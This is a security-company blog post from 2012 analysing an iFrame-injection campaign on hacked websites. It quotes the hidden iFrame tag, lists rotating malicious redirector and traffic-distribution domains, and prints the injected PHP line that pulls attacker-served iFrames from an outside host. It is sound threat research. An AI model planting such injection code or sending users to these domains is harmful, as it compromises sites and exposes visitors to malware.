• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Sorryforthiscode

Sorryforthiscode – iFrame Injection

September 28, 2012Daniel Cid

0
SHARES
FacebookTwitterSubscribe

We were working on a compromised site today that had some hidden iFrames on it. The iFrames were redirecting visitors to what seemed like random domains. This is the iFrame we were seeing:

<iFrame src="httx://directs016. ru/in.cgi?wal" width=1 height=1 ..

Nothing new, but we decided to check how popular it was, and we were able to detect a few other sites with it. After a while the iFrame being injected changed and as we continued to track it, we noticed that it was changing every few hours. Here are some of the domains used up in the last few days:

http://directs005.ru/in.cgi?wal (78.46.101.80)
http://directs012.ru/in.cgi?wal (78.46.101.80)
http://directs013.ru/in.cgi?wal (78.46.101.80)
http://directs014.ru/in.cgi?wal (78.46.101.80)
http://directs015.ru/in.cgi?wal (78.46.101.80)
http://directs016.ru/in.cgi?wal (78.46.101.80)
http://directs027.eu/in.cgi?wal (78.46.101.80)
http://directs026.eu/in.cgi?wal (78.46.101.80)
http://directs025.eu/in.cgi?wal (78.46.101.80)

.. many more …

Once this initial iFrame it loaded, it is used as a redirector to secondary domains:

http://promoution013.eu/flow1.php
http://promoution014.eu/flow1.php
http://promoution015.eu/flow1.php
http://promoution016.eu/flow1.php
http://directs015.eu/flow08.php
http://directs015.eu/flow1.php
http://directs019.eu/flow08.php
http://promoution014.eu/flow08.php
http://directs014.eu/flow08.php

.. and many more variations – also changing every few hours ..

Once the secondary domains are loaded, it redirects the browser back to the directs00x.ru domain to distribute the traffic (SutraTDS/Traffic Distributions System):

http://directs009.ru/tds/in.cgi?default
http://directs006.ru/tds/in.cgi?default

This Traffic Distribution System (TDS) redirects the user randomly to affiliate sites (pharmacy / Pornography) or malware domains pushing off a Fake AV (antivirus) :

http://freehdpornvideos.info
http://melroseurbanfemale.org
http://eso3efkm34.shiparrestinistanbul.org/PDn9xzNUROvSNPse
http://globaltravelexpress.com/26422274.html
http://qiofnvpwo.gr8domain.biz/vd/5;5cd75596797b104d92dc9441749ba4d9
http://azdtsc.toythieves.com/uda377234/78576ecbcn.htm
http://cartoonxpics.net

Traffic Distribution Systems / TDS

Using a TDS is a very simple way for the bad guys to make money. They compromise a site and redirect users of that hacked site to a TDS, where they receive an affiliate commission for the traffic sent.

Other bad guys can buy “spots” on those TDS’s and redirect users to their Pharma pages or exploit kit pages.

Code generation – Sorryforthiscode

In the beginning of the post, we mentioned that the iFrames change automatically on the compromised sites. It happens because instead of inserting the iFrame directly on the pages, they inject a PHP code to call sorryforthiscode.org and get the iFrame to display:

file_get_contents("http://sorryforthiscode.org/touch.php?ip=CLIENTIP");

Yes, sorry for this code… sorryforthiscode.org was registered on Sep 20,2012 by iamsorry@hotmail.ru.

Domain Name:SORRYFORTHISCODE.ORG
Created On:20-Sep-2012 23:06:27 UTC
Last Updated On:20-Sep-2012 23:06:27 UTC
Expiration Date:20-Sep-2013 23:06:27 UTC
Registrant Email:iamsorry@hotmail.ru

The domain is host on a shared server with more domains.

We will post more details as we continue to monitor this campaign. Note that our SiteCheck scanner will detect this type of compromise.

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates

About Daniel Cid

Daniel B. Cid is Founder of Sucuri and the VP of Engineering for the GoDaddy Security Products group. He is also the founder of OSSEC and CleanBrowsing. You can find more about Daniel on his site dcid.me or on Twitter: @danielcid

Reader Interactions

Comments

  1. Orun Bhuiyan

    September 28, 2012

    Russians! I knew it.

    Thanks for the informative post Daniel.

  2. Adeel Sami

    September 28, 2012

    Thanks Daniel, I admire the service been given by Sucuri.

  3. Stan

    September 28, 2012

    My site on bluehost was hit with the eval base64 php exploit last night at 2300 EDT. Looks awfully familiar to the above (without using iframes).

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2022 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.